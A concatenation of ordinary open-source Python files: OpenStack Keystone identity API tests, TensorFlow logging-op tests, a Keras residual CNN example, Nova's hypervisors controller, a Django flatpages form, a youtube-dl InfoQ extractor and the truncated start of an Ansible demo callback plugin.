        user = self.identity_api.create_user(user)
        resource_url = '/users'
        r = self.get(resource_url)
        self.assertValidUserListResponse(r, ref=user,
                                         resource_url=resource_url)

    def test_get_user(self):
        """Call ``GET /users/{user_id}``."""
        r = self.get('/users/%(user_id)s' % {
            'user_id': self.user['id']})
        self.assertValidUserResponse(r, self.user)

    def test_get_user_with_default_project(self):
        """Call ``GET /users/{user_id}`` making sure of default_project_id."""
        user = self.new_user_ref(domain_id=self.domain_id,
                                 project_id=self.project_id)
        user = self.identity_api.create_user(user)
        r = self.get('/users/%(user_id)s' % {'user_id': user['id']})
        self.assertValidUserResponse(r, user)

    def test_add_user_to_group(self):
        """Call ``PUT /groups/{group_id}/users/{user_id}``."""
        self.put('/groups/%(group_id)s/users/%(user_id)s' % {
            'group_id': self.group_id, 'user_id': self.user['id']})

    def test_list_groups_for_user(self):
        """Call ``GET /users/{user_id}/groups``."""
        self.user1 = self.new_user_ref(
            domain_id=self.domain['id'])
        password = self.user1['password']
        self.user1 = self.identity_api.create_user(self.user1)
        self.user1['password'] = password
        self.user2 = self.new_user_ref(
            domain_id=self.domain['id'])
        password = self.user2['password']
        self.user2 = self.identity_api.create_user(self.user2)
        self.user2['password'] = password
        self.put('/groups/%(group_id)s/users/%(user_id)s' % {
            'group_id': self.group_id, 'user_id': self.user1['id']})

        # Scenarios below are written to test the default policy configuration

        # One should be allowed to list one's own groups
        auth = self.build_authentication_request(
            user_id=self.user1['id'],
            password=self.user1['password'])
        resource_url = ('/users/%(user_id)s/groups' %
                        {'user_id': self.user1['id']})
        r = self.get(resource_url, auth=auth)
        self.assertValidGroupListResponse(r, ref=self.group,
                                          resource_url=resource_url)

        # Administrator is allowed to list others' groups
        resource_url = ('/users/%(user_id)s/groups' %
                        {'user_id': self.user1['id']})
        r = self.get(resource_url)
        self.assertValidGroupListResponse(r, ref=self.group,
                                          resource_url=resource_url)

        # Ordinary users should not be allowed to list other's groups
        auth = self.build_authentication_request(
            user_id=self.user2['id'],
            password=self.user2['password'])
        r = self.get('/users/%(user_id)s/groups' % {
            'user_id': self.user1['id']}, auth=auth,
            expected_status=exception.ForbiddenAction.code)

    def test_check_user_in_group(self):
        """Call ``HEAD /groups/{group_id}/users/{user_id}``."""
        self.put('/groups/%(group_id)s/users/%(user_id)s' % {
            'group_id': self.group_id, 'user_id': self.user['id']})
        self.head('/groups/%(group_id)s/users/%(user_id)s' % {
            'group_id': self.group_id, 'user_id': self.user['id']})

    def test_list_users_in_group(self):
        """Call ``GET /groups/{group_id}/users``."""
        self.put('/groups/%(group_id)s/users/%(user_id)s' % {
            'group_id': self.group_id, 'user_id': self.user['id']})
        resource_url = ('/groups/%(group_id)s/users' %
                        {'group_id': self.group_id})
        r = self.get(resource_url)
        self.assertValidUserListResponse(r, ref=self.user,
                                         resource_url=resource_url)
        self.assertIn('/groups/%(group_id)s/users' % {
            'group_id': self.group_id}, r.result['links']['self'])

    def test_remove_user_from_group(self):
        """Call ``DELETE /groups/{group_id}/users/{user_id}``."""
        self.put('/groups/%(group_id)s/users/%(user_id)s' % {
            'group_id': self.group_id, 'user_id': self.user['id']})
        self.delete('/groups/%(group_id)s/users/%(user_id)s' % {
            'group_id': self.group_id, 'user_id': self.user['id']})

    def test_update_user(self):
        """Call ``PATCH /users/{user_id}``."""
        user = self.new_user_ref(domain_id=self.domain_id)
        del user['id']
        r = self.patch('/users/%(user_id)s' % {
            'user_id': self.user['id']},
            body={'user': user})
        self.assertValidUserResponse(r, user)

    def test_admin_password_reset(self):
        # bootstrap a user as admin
        user_ref = self.new_user_ref(domain_id=self.domain['id'])
        password = user_ref['password']
        user_ref = self.identity_api.create_user(user_ref)

        # auth as user should work before a password change
        old_password_auth = self.build_authentication_request(
            user_id=user_ref['id'],
            password=password)
        r = self.v3_authenticate_token(old_password_auth, expected_status=201)
        old_token = r.headers.get('X-Subject-Token')

        # auth as user with a token should work before a password change
        old_token_auth = self.build_authentication_request(token=old_token)
        self.v3_authenticate_token(old_token_auth, expected_status=201)

        # administrative password reset
        new_password = uuid.uuid4().hex
        self.patch('/users/%s' % user_ref['id'],
                   body={'user': {'password': new_password}},
                   expected_status=200)

        # auth as user with original password should not work after change
        self.v3_authenticate_token(old_password_auth, expected_status=401)

        # auth as user with an old token should not work after change
        self.v3_authenticate_token(old_token_auth, expected_status=404)

        # new password should work
        new_password_auth = self.build_authentication_request(
            user_id=user_ref['id'],
            password=new_password)
        self.v3_authenticate_token(new_password_auth, expected_status=201)

    def test_update_user_domain_id(self):
        """Call ``PATCH /users/{user_id}`` with domain_id."""
        user = self.new_user_ref(domain_id=self.domain['id'])
        user = self.identity_api.create_user(user)
        # Moving a user between domains is rejected while domain_id is
        # immutable (the default)
        user['domain_id'] = CONF.identity.default_domain_id
        r = self.patch('/users/%(user_id)s' % {
            'user_id': user['id']},
            body={'user': user},
            expected_status=exception.ValidationError.code)
        self.config_fixture.config(domain_id_immutable=False)
        user['domain_id'] = self.domain['id']
        r = self.patch('/users/%(user_id)s' % {
            'user_id': user['id']},
            body={'user': user})
        self.assertValidUserResponse(r, user)

    def test_delete_user(self):
        """Call ``DELETE /users/{user_id}``.

        As well as making sure the delete succeeds, we ensure
        that any credentials that reference this user are
        also deleted, while other credentials are unaffected.
        In addition, no tokens should remain valid for this user.

        """
        # First check the credential for this user is present
        r = self.credential_api.get_credential(self.credential['id'])
        self.assertDictEqual(r, self.credential)
        # Create a second credential with a different user
        self.user2 = self.new_user_ref(
            domain_id=self.domain['id'],
            project_id=self.project['id'])
        self.user2 = self.identity_api.create_user(self.user2)
        self.credential2 = self.new_credential_ref(
            user_id=self.user2['id'],
            project_id=self.project['id'])
        self.credential_api.create_credential(
            self.credential2['id'],
            self.credential2)

        # Create a token for this user which we can check later
        # gets deleted
        auth_data = self.build_authentication_request(
            user_id=self.user['id'],
            password=self.user['password'],
            project_id=self.project['id'])
        token = self.get_requested_token(auth_data)
        # Confirm token is valid for now
        self.head('/auth/tokens',
                  headers={'X-Subject-Token': token},
                  expected_status=200)

        # Now delete the user
        self.delete('/users/%(user_id)s' % {
            'user_id': self.user['id']})

        # Deleting the user should have deleted any credentials
        # that reference this user
        self.assertRaises(exception.CredentialNotFound,
                          self.credential_api.get_credential,
                          self.credential['id'])
        # And no tokens should remain valid for the deleted user
        tokens = self.token_provider_api._persistence._list_tokens(
            self.user['id'])
        self.assertEqual(0, len(tokens))
        # But the credential for user2 is unaffected
        r = self.credential_api.get_credential(self.credential2['id'])
        self.assertDictEqual(r, self.credential2)

    # group crud tests

    def test_create_group(self):
        """Call ``POST /groups``."""
        ref = self.new_group_ref(domain_id=self.domain_id)
        r = self.post(
            '/groups',
            body={'group': ref})
        return self.assertValidGroupResponse(r, ref)

    def test_create_group_400(self):
        """Call ``POST /groups`` with an empty group entity (bad request)."""
        self.post('/groups', body={'group': {}}, expected_status=400)

    def test_list_groups(self):
        """Call ``GET /groups``."""
        resource_url = '/groups'
        r = self.get(resource_url)
        self.assertValidGroupListResponse(r, ref=self.group,
                                          resource_url=resource_url)

    def test_get_group(self):
        """Call ``GET /groups/{group_id}``."""
        r = self.get('/groups/%(group_id)s' % {
            'group_id': self.group_id})
        self.assertValidGroupResponse(r, self.group)

    def test_update_group(self):
        """Call ``PATCH /groups/{group_id}``."""
        group = self.new_group_ref(domain_id=self.domain_id)
        del group['id']
        r = self.patch('/groups/%(group_id)s' % {
            'group_id': self.group_id},
            body={'group': group})
        self.assertValidGroupResponse(r, group)

    def test_update_group_domain_id(self):
        """Call ``PATCH /groups/{group_id}`` with domain_id."""
        group = self.new_group_ref(domain_id=self.domain['id'])
        group = self.identity_api.create_group(group)
        # Moving a group between domains is rejected while domain_id is
        # immutable (the default)
        group['domain_id'] = CONF.identity.default_domain_id
        r = self.patch('/groups/%(group_id)s' % {
            'group_id': group['id']},
            body={'group': group},
            expected_status=exception.ValidationError.code)
        self.config_fixture.config(domain_id_immutable=False)
        group['domain_id'] = self.domain['id']
        r = self.patch('/groups/%(group_id)s' % {
            'group_id': group['id']},
            body={'group': group})
        self.assertValidGroupResponse(r, group)

    def test_delete_group(self):
        """Call ``DELETE /groups/{group_id}``."""
        self.delete('/groups/%(group_id)s' % {
            'group_id': self.group_id})
class IdentityV3toV2MethodsTestCase(tests.TestCase):
    """Test users V3 to V2 conversion methods."""

    def setUp(self):
        super(IdentityV3toV2MethodsTestCase, self).setUp()
        self.load_backends()
        self.user_id = uuid.uuid4().hex
        self.default_project_id = uuid.uuid4().hex
        self.tenant_id = uuid.uuid4().hex
        self.domain_id = uuid.uuid4().hex
        # User with only default_project_id in ref
        self.user1 = {'id': self.user_id,
                      'name': self.user_id,
                      'default_project_id': self.default_project_id,
                      'domain_id': self.domain_id}
        # User without default_project_id or tenantId in ref
        self.user2 = {'id': self.user_id,
                      'name': self.user_id,
                      'domain_id': self.domain_id}
        # User with both tenantId and default_project_id in ref
        self.user3 = {'id': self.user_id,
                      'name': self.user_id,
                      'default_project_id': self.default_project_id,
                      'tenantId': self.tenant_id,
                      'domain_id': self.domain_id}
        # User with only tenantId in ref
        self.user4 = {'id': self.user_id,
                      'name': self.user_id,
                      'tenantId': self.tenant_id,
                      'domain_id': self.domain_id}

        # Expected result if the user is meant to have a tenantId element
        self.expected_user = {'id': self.user_id,
                              'name': self.user_id,
                              'username': self.user_id,
                              'tenantId': self.default_project_id}

        # Expected result if the user is not meant to have a tenantId element
        self.expected_user_no_tenant_id = {'id': self.user_id,
                                           'name': self.user_id,
                                           'username': self.user_id}

    def test_v3_to_v2_user_method(self):
        # v3_to_v2_user mutates its argument in place and returns the same
        # object, so both identity and contents are checked here
        updated_user1 = controller.V2Controller.v3_to_v2_user(self.user1)
        self.assertIs(self.user1, updated_user1)
        self.assertDictEqual(self.user1, self.expected_user)
        updated_user2 = controller.V2Controller.v3_to_v2_user(self.user2)
        self.assertIs(self.user2, updated_user2)
        self.assertDictEqual(self.user2, self.expected_user_no_tenant_id)
        updated_user3 = controller.V2Controller.v3_to_v2_user(self.user3)
        self.assertIs(self.user3, updated_user3)
        self.assertDictEqual(self.user3, self.expected_user)
        updated_user4 = controller.V2Controller.v3_to_v2_user(self.user4)
        self.assertIs(self.user4, updated_user4)
        self.assertDictEqual(self.user4, self.expected_user_no_tenant_id)

    def test_v3_to_v2_user_method_list(self):
        user_list = [self.user1, self.user2, self.user3, self.user4]
        updated_list = controller.V2Controller.v3_to_v2_user(user_list)

        self.assertEqual(len(updated_list), len(user_list))

        for i, ref in enumerate(updated_list):
            # Order should not change.
            self.assertIs(ref, user_list[i])

        self.assertDictEqual(self.user1, self.expected_user)
        self.assertDictEqual(self.user2, self.expected_user_no_tenant_id)
        self.assertDictEqual(self.user3, self.expected_user)
        self.assertDictEqual(self.user4, self.expected_user_no_tenant_id)
class UserSelfServiceChangingPasswordsTestCase(test_v3.RestfulTestCase):
    """Tests for the self-service password change API."""

    def setUp(self):
        super(UserSelfServiceChangingPasswordsTestCase, self).setUp()
        self.user_ref = self.new_user_ref(domain_id=self.domain['id'])
        password = self.user_ref['password']
        self.user_ref = self.identity_api.create_user(self.user_ref)
        # create_user does not return the clear-text password, so restore it
        self.user_ref['password'] = password
        self.token = self.get_request_token(self.user_ref['password'], 201)

    def get_request_token(self, password, expected_status):
        """Authenticate with the given password and return the token ID."""
        auth_data = self.build_authentication_request(
            user_id=self.user_ref['id'],
            password=password)
        r = self.v3_authenticate_token(auth_data,
                                       expected_status=expected_status)
        return r.headers.get('X-Subject-Token')

    def change_password(self, expected_status, **kwargs):
        """Returns a test response for a change password request."""
        return self.post('/users/%s/password' % self.user_ref['id'],
                         body={'user': kwargs},
                         token=self.token,
                         expected_status=expected_status)

    def test_changing_password(self):
        # original password works
        token_id = self.get_request_token(self.user_ref['password'],
                                          expected_status=201)
        # original token works
        old_token_auth = self.build_authentication_request(token=token_id)
        self.v3_authenticate_token(old_token_auth, expected_status=201)

        # change password
        new_password = uuid.uuid4().hex
        self.change_password(password=new_password,
                             original_password=self.user_ref['password'],
                             expected_status=204)

        # old password fails
        self.get_request_token(self.user_ref['password'], expected_status=401)

        # old token fails
        self.v3_authenticate_token(old_token_auth, expected_status=404)

        # new password works
        self.get_request_token(new_password, expected_status=201)

    def test_changing_password_with_missing_original_password_fails(self):
        r = self.change_password(password=uuid.uuid4().hex,
                                 expected_status=400)
        self.assertThat(r.result['error']['message'],
                        matchers.Contains('original_password'))

    def test_changing_password_with_missing_password_fails(self):
        r = self.change_password(original_password=self.user_ref['password'],
                                 expected_status=400)
        self.assertThat(r.result['error']['message'],
                        matchers.Contains('password'))

    def test_changing_password_with_incorrect_password_fails(self):
        self.change_password(password=uuid.uuid4().hex,
                             original_password=uuid.uuid4().hex,
                             expected_status=401)

    def test_changing_password_with_disabled_user_fails(self):
        # disable the user account
        self.user_ref['enabled'] = False
        self.patch('/users/%s' % self.user_ref['id'],
                   body={'user': self.user_ref})

        self.change_password(password=uuid.uuid4().hex,
                             original_password=self.user_ref['password'],
                             expected_status=401)
| apache-2.0 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.kernels.logging_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
class LoggingOpsTest(tf.test.TestCase):
  """Tests for tf.Assert used as a control dependency."""

  def testAssertDivideByZero(self):
    with self.test_session() as sess:
      epsilon = tf.convert_to_tensor(1e-20)
      x = tf.convert_to_tensor(0.0)
      y = tf.convert_to_tensor(1.0)
      z = tf.convert_to_tensor(2.0)
      # assert(epsilon < y)
      # z / y
      with sess.graph.control_dependencies(
          [tf.Assert(tf.less(epsilon, y), ["Divide-by-zero"])]):
        out = tf.div(z, y)
      self.assertAllEqual(2.0, out.eval())
      # assert(epsilon < x)
      # z / x
      #
      # This tests printing out multiple tensors
      with sess.graph.control_dependencies(
          [tf.Assert(tf.less(epsilon, x),
                     ["Divide-by-zero", "less than x"])]):
        out = tf.div(z, x)
      # The failed assertion should surface its message in the op error
      with self.assertRaisesOpError("less than x"):
        out.eval()
class PrintGradientTest(tf.test.TestCase):
    """Checks that tf.Print behaves as an identity op for shapes and gradients."""

    def testPrintShape(self):
        """tf.Print must not alter the static shape of its input."""
        source = tf.constant(2.0, shape=[100, 32])
        printed = tf.Print(source, [source])
        self.assertEqual(source.get_shape(), printed.get_shape())

    def testPrintGradient(self):
        """Gradients must flow through tf.Print unchanged."""
        with self.test_session():
            inp = tf.constant(2.0, shape=[100, 32], name="in")
            w = tf.constant(4.0, shape=[10, 100], name="w")
            wx = tf.matmul(w, inp, name="wx")
            wx_print = tf.Print(wx, [w, w, w])
            grad_plain = tf.gradients(wx, w)[0]
            grad_printed = tf.gradients(wx_print, w)[0]
            plain_value = grad_plain.eval()
            printed_value = grad_printed.eval()
            self.assertAllEqual(plain_value, printed_value)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 |
lukas/scikit-class | examples/keras-cnn/resnet-cnn.py | 2 | 1929 | from keras.datasets import mnist
from keras.models import Sequential, Model
from keras.layers import Conv2D, MaxPooling2D, Dropout, Dense, Flatten, Input, Add
from keras.utils import np_utils
from wandb.keras import WandbCallback
import wandb
import os
# Initialise a Weights & Biases run and record the hyperparameters on its
# config object so they are logged alongside training metrics.
run = wandb.init()
config = run.config
config.first_layer_convs = 32
config.first_layer_conv_width = 3   # conv kernel width
config.first_layer_conv_height = 3  # conv kernel height
config.dropout = 0.2  # NOTE(review): no Dropout layer is built below -- unused? confirm
config.dense_layer_size = 128
config.img_width = 28
config.img_height = 28
config.epochs = 10
(X_train, y_train), (X_test, y_test) = mnist.load_data()

# Scale pixel values from integer [0, 255] to float [0.0, 1.0].
X_train = X_train.astype('float32')
X_train /= 255.
X_test = X_test.astype('float32')
X_test /= 255.

# reshape input data
# Add an explicit single-channel axis: (N, 28, 28) -> (N, 28, 28, 1).
X_train = X_train.reshape(
    X_train.shape[0], config.img_width, config.img_height, 1)
X_test = X_test.reshape(
    X_test.shape[0], config.img_width, config.img_height, 1)

# one hot encode outputs
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
num_classes = y_test.shape[1]
labels = [str(i) for i in range(10)]
# build model
# Functional-graph model with one residual connection:
#   input -> 3x3 conv ---\
#   input -> 1x1 conv ---+-> Add -> MaxPool -> Flatten -> Dense -> softmax
inputs = Input(shape=(28, 28, 1))
conv_out = Conv2D(32,
                  (config.first_layer_conv_width, config.first_layer_conv_height),
                  activation='relu', padding='same')(inputs)
# The 1x1 convolution projects the 1-channel input up to 32 channels so the
# two branches have matching shapes for the element-wise Add.
res_input = Conv2D(32, (1, 1), activation='relu', padding='same')(inputs)
add_out = Add()([conv_out, res_input])
# BUG FIX: this previously pooled `conv_out`, which left `add_out` (and the
# whole 1x1 shortcut branch) disconnected from the graph -- the "resnet"
# example was not residual at all. Pool the Add output instead.
max_pool_out = MaxPooling2D(pool_size=(2, 2))(add_out)
flatten_out = Flatten()(max_pool_out)
dense1_out = Dense(config.dense_layer_size, activation='relu')(flatten_out)
dense2_out = Dense(num_classes, activation='softmax')(dense1_out)

model = Model(inputs, dense2_out)
model.compile(loss='categorical_crossentropy', optimizer='adam',
              metrics=['accuracy'])
model.fit(X_train, y_train, validation_data=(X_test, y_test),
          epochs=config.epochs,
          callbacks=[WandbCallback(data_type="image", save_model=False)])
| gpl-2.0 |
bigswitch/nova | nova/api/openstack/compute/hypervisors.py | 3 | 8033 | # Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hypervisors admin extension."""
import webob.exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova.i18n import _
from nova import servicegroup
ALIAS = "os-hypervisors"
authorize = extensions.os_compute_authorizer(ALIAS)
class HypervisorsController(wsgi.Controller):
    """The Hypervisors API controller for the OpenStack API."""

    def __init__(self):
        # APIs used to look up compute nodes, their services and liveness.
        self.host_api = compute.HostAPI()
        self.servicegroup_api = servicegroup.API()
        super(HypervisorsController, self).__init__()

    def _view_hypervisor(self, hypervisor, service, detail, servers=None,
                         **kwargs):
        """Build the REST representation of one compute node.

        :param hypervisor: ComputeNode object to serialize
        :param service: the nova-compute Service record for that node; used
            for the 'state' (up/down) and 'status' (enabled/disabled) fields
        :param detail: include resource-usage fields and service info
            (skipped when ``servers`` is supplied)
        :param servers: optional instances running on the node, rendered as
            a list of name/uuid pairs
        :param kwargs: extra key/value pairs merged verbatim into the view
        """
        alive = self.servicegroup_api.service_is_up(service)
        hyp_dict = {
            'id': hypervisor.id,
            'hypervisor_hostname': hypervisor.hypervisor_hostname,
            'state': 'up' if alive else 'down',
            'status': ('disabled' if service.disabled
                       else 'enabled'),
            }

        if detail and not servers:
            for field in ('vcpus', 'memory_mb', 'local_gb', 'vcpus_used',
                          'memory_mb_used', 'local_gb_used',
                          'hypervisor_type', 'hypervisor_version',
                          'free_ram_mb', 'free_disk_gb', 'current_workload',
                          'running_vms', 'cpu_info', 'disk_available_least',
                          'host_ip'):
                hyp_dict[field] = getattr(hypervisor, field)

            hyp_dict['service'] = {
                'id': service.id,
                'host': hypervisor.host,
                'disabled_reason': service.disabled_reason,
                }

        if servers:
            hyp_dict['servers'] = [dict(name=serv['name'], uuid=serv['uuid'])
                                   for serv in servers]

        # Add any additional info
        if kwargs:
            hyp_dict.update(kwargs)

        return hyp_dict

    @extensions.expected_errors(())
    def index(self, req):
        """List all hypervisors (summary view)."""
        context = req.environ['nova.context']
        authorize(context)
        compute_nodes = self.host_api.compute_node_get_all(context)
        req.cache_db_compute_nodes(compute_nodes)
        return dict(hypervisors=[self._view_hypervisor(
                                     hyp,
                                     self.host_api.service_get_by_compute_host(
                                         context, hyp.host),
                                     False)
                                 for hyp in compute_nodes])

    @extensions.expected_errors(())
    def detail(self, req):
        """List all hypervisors (detailed view with usage fields)."""
        context = req.environ['nova.context']
        authorize(context)
        compute_nodes = self.host_api.compute_node_get_all(context)
        req.cache_db_compute_nodes(compute_nodes)
        return dict(hypervisors=[self._view_hypervisor(
                                     hyp,
                                     self.host_api.service_get_by_compute_host(
                                         context, hyp.host),
                                     True)
                                 for hyp in compute_nodes])

    @extensions.expected_errors(404)
    def show(self, req, id):
        """Show the detailed view of one hypervisor; 404 if unknown."""
        context = req.environ['nova.context']
        authorize(context)
        try:
            hyp = self.host_api.compute_node_get(context, id)
            req.cache_db_compute_node(hyp)
        except (ValueError, exception.ComputeHostNotFound):
            # ValueError covers a non-integer id in the URL.
            msg = _("Hypervisor with ID '%s' could not be found.") % id
            raise webob.exc.HTTPNotFound(explanation=msg)
        service = self.host_api.service_get_by_compute_host(
            context, hyp.host)
        return dict(hypervisor=self._view_hypervisor(hyp, service, True))

    @extensions.expected_errors((400, 404, 501))
    def uptime(self, req, id):
        """Return the summary view of one hypervisor plus its host uptime."""
        context = req.environ['nova.context']
        authorize(context)
        try:
            hyp = self.host_api.compute_node_get(context, id)
            req.cache_db_compute_node(hyp)
        except (ValueError, exception.ComputeHostNotFound):
            msg = _("Hypervisor with ID '%s' could not be found.") % id
            raise webob.exc.HTTPNotFound(explanation=msg)

        # Get the uptime
        try:
            host = hyp.host
            uptime = self.host_api.get_host_uptime(context, host)
        except NotImplementedError:
            # The virt driver does not report uptime -> 501.
            common.raise_feature_not_supported()
        except exception.ComputeServiceUnavailable as e:
            raise webob.exc.HTTPBadRequest(explanation=e.format_message())

        service = self.host_api.service_get_by_compute_host(context, host)
        return dict(hypervisor=self._view_hypervisor(hyp, service, False,
                                                     uptime=uptime))

    @extensions.expected_errors(404)
    def search(self, req, id):
        """List hypervisors whose hostname matches the given pattern."""
        context = req.environ['nova.context']
        authorize(context)
        hypervisors = self.host_api.compute_node_search_by_hypervisor(
            context, id)
        if hypervisors:
            return dict(hypervisors=[self._view_hypervisor(
                                         hyp,
                                         self.host_api.service_get_by_compute_host(
                                             context, hyp.host),
                                         False)
                                     for hyp in hypervisors])
        else:
            msg = _("No hypervisor matching '%s' could be found.") % id
            raise webob.exc.HTTPNotFound(explanation=msg)

    @extensions.expected_errors(404)
    def servers(self, req, id):
        """List matching hypervisors together with the instances they host."""
        context = req.environ['nova.context']
        authorize(context)
        compute_nodes = self.host_api.compute_node_search_by_hypervisor(
            context, id)
        if not compute_nodes:
            msg = _("No hypervisor matching '%s' could be found.") % id
            raise webob.exc.HTTPNotFound(explanation=msg)
        hypervisors = []
        for compute_node in compute_nodes:
            instances = self.host_api.instance_get_all_by_host(context,
                                                               compute_node.host)
            service = self.host_api.service_get_by_compute_host(
                context, compute_node.host)
            hyp = self._view_hypervisor(compute_node, service, False,
                                        instances)
            hypervisors.append(hyp)
        return dict(hypervisors=hypervisors)

    @extensions.expected_errors(())
    def statistics(self, req):
        """Return aggregate resource statistics across all compute nodes."""
        context = req.environ['nova.context']
        authorize(context)
        stats = self.host_api.compute_node_statistics(context)
        return dict(hypervisor_statistics=stats)
class Hypervisors(extensions.V21APIExtensionBase):
    """Admin-only hypervisor administration."""

    name = "Hypervisors"
    alias = ALIAS
    version = 1

    def get_resources(self):
        """Register the os-hypervisors resource with its extra GET actions."""
        collection_actions = {'detail': 'GET',
                              'statistics': 'GET'}
        member_actions = {'uptime': 'GET',
                          'search': 'GET',
                          'servers': 'GET'}
        resource = extensions.ResourceExtension(
            ALIAS,
            HypervisorsController(),
            collection_actions=collection_actions,
            member_actions=member_actions)
        return [resource]

    def get_controller_extensions(self):
        """This extension contributes no controller extensions."""
        return []
| apache-2.0 |
joeyjojo/django_offline | src/django/contrib/flatpages/forms.py | 79 | 1727 | from django import forms
from django.conf import settings
from django.contrib.flatpages.models import FlatPage
from django.utils.translation import ugettext, ugettext_lazy as _
class FlatpageForm(forms.ModelForm):
    """Admin form for FlatPage.

    Validates that the URL contains only safe characters, carries the
    slashes implied by the middleware configuration, and is unique per site.
    """
    url = forms.RegexField(label=_("URL"), max_length=100, regex=r'^[-\w/\.~]+$',
        help_text = _("Example: '/about/contact/'. Make sure to have leading"
                      " and trailing slashes."),
        error_message = _("This value must contain only letters, numbers,"
                          " dots, underscores, dashes, slashes or tildes."))

    class Meta:
        model = FlatPage

    def clean_url(self):
        """Require a leading slash, and a trailing slash whenever
        APPEND_SLASH + CommonMiddleware would redirect to the slashed URL."""
        url = self.cleaned_data['url']
        if not url.startswith('/'):
            raise forms.ValidationError(ugettext("URL is missing a leading slash."))
        if (settings.APPEND_SLASH and
            'django.middleware.common.CommonMiddleware' in settings.MIDDLEWARE_CLASSES and
            not url.endswith('/')):
            raise forms.ValidationError(ugettext("URL is missing a trailing slash."))
        return url

    def clean(self):
        """Reject a URL that already exists on any of the selected sites."""
        url = self.cleaned_data.get('url', None)
        sites = self.cleaned_data.get('sites', None)

        same_url = FlatPage.objects.filter(url=url)
        if self.instance.pk:
            # Editing an existing page: don't compare it against itself.
            same_url = same_url.exclude(pk=self.instance.pk)

        if same_url.filter(sites__in=sites).exists():
            for site in sites:
                if same_url.filter(sites=site).exists():
                    # BUG FIX: translate the message template first, then
                    # interpolate. The old code interpolated *before* calling
                    # the translation function, so the msgid was dynamic and
                    # could never match an entry in a translation catalog.
                    raise forms.ValidationError(
                        _('Flatpage with url %(url)s already exists for site %(site)s')
                        % {'url': url, 'site': site})

        return super(FlatpageForm, self).clean()
| mit |
0x7678/youtube-dl | youtube_dl/extractor/infoq.py | 36 | 2115 | from __future__ import unicode_literals
import base64
from .common import InfoExtractor
from ..compat import (
compat_urllib_parse,
)
class InfoQIE(InfoExtractor):
    """Extractor for InfoQ presentation pages."""
    # Matches e.g. http://www.infoq.com/presentations/<slug>
    _VALID_URL = r'https?://(?:www\.)?infoq\.com/[^/]+/(?P<id>[^/]+)$'

    _TEST = {
        'url': 'http://www.infoq.com/presentations/A-Few-of-My-Favorite-Python-Things',
        'md5': 'b5ca0e0a8c1fed93b0e65e48e462f9a2',
        'info_dict': {
            'id': '12-jan-pythonthings',
            'ext': 'mp4',
            'description': 'Mike Pirnat presents some tips and tricks, standard libraries and third party packages that make programming in Python a richer experience.',
            'title': 'A Few of My Favorite [Python] Things',
        },
    }

    def _real_extract(self, url):
        """Extract one RTMP and one HTTP format for an InfoQ presentation."""
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)

        video_title = self._html_search_regex(r'<title>(.*?)</title>', webpage, 'title')
        video_description = self._html_search_meta('description', webpage, 'description')

        # The server URL is hardcoded
        video_url = 'rtmpe://video.infoq.com/cfx/st/'

        # Extract video URL
        # The page embeds the real media path base64- and URL-encoded in the
        # 'jsclassref' JS variable; decode it to get the playpath.
        encoded_id = self._search_regex(
            r"jsclassref\s*=\s*'([^']*)'", webpage, 'encoded id')
        real_id = compat_urllib_parse.unquote(base64.b64decode(encoded_id.encode('ascii')).decode('utf-8'))
        playpath = 'mp4:' + real_id

        video_filename = playpath.split('/')[-1]
        # NOTE: rebinds video_id -- from here on it is the filename stem from
        # the decoded playpath, not the slug matched from the URL.
        video_id, extension = video_filename.split('.')

        http_base = self._search_regex(
            r'EXPRESSINSTALL_SWF\s*=\s*"(https?://[^/"]+/)', webpage,
            'HTTP base URL')

        formats = [{
            'format_id': 'rtmp',
            'url': video_url,
            'ext': extension,
            'play_path': playpath,
        }, {
            'format_id': 'http',
            'url': http_base + real_id,
        }]
        self._sort_formats(formats)

        return {
            'id': video_id,
            'title': video_title,
            'description': video_description,
            'formats': formats,
        }
| unlicense |
andmos/ansible | lib/ansible/plugins/callback/context_demo.py | 118 | 1793 | # (C) 2012, Michael DeHaan, <michael.dehaan@gmail.com>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: context_demo
type: aggregate
short_description: demo callback that adds play/task context
description:
- Displays some play and task context along with normal output
- This is mostly for demo purposes
version_added: "2.1"
requirements:
- whitelist in configuration
'''
from ansible.plugins.callback import CallbackBase
class CallbackModule(CallbackBase):
    """Demo callback showing how a plugin can access play and task objects.

    ``play`` is ``None`` for runner invocations and ``task`` is ``None`` for
    'setup' invocations.
    """

    CALLBACK_VERSION = 2.0
    CALLBACK_TYPE = 'aggregate'
    CALLBACK_NAME = 'context_demo'
    CALLBACK_NEEDS_WHITELIST = True

    def __init__(self, *args, **kwargs):
        super(CallbackModule, self).__init__(*args, **kwargs)
        # Most recent play/task; populated by the *_start hooks below.
        self.play = None
        self.task = None

    def v2_on_any(self, *args, **kwargs):
        """Dump the current play/task context and the raw event payload."""
        display = self._display.display
        play_name = getattr(self.play, 'name', None)
        display("--- play: {0} task: {1} ---".format(play_name, self.task))
        display(" --- ARGS ")
        for index, arg in enumerate(args):
            display(' %s: %s' % (index, arg))
        display(" --- KWARGS ")
        for key in kwargs:
            display(' %s: %s' % (key, kwargs[key]))

    def v2_playbook_on_play_start(self, play):
        self.play = play

    def v2_playbook_on_task_start(self, task, is_conditional):
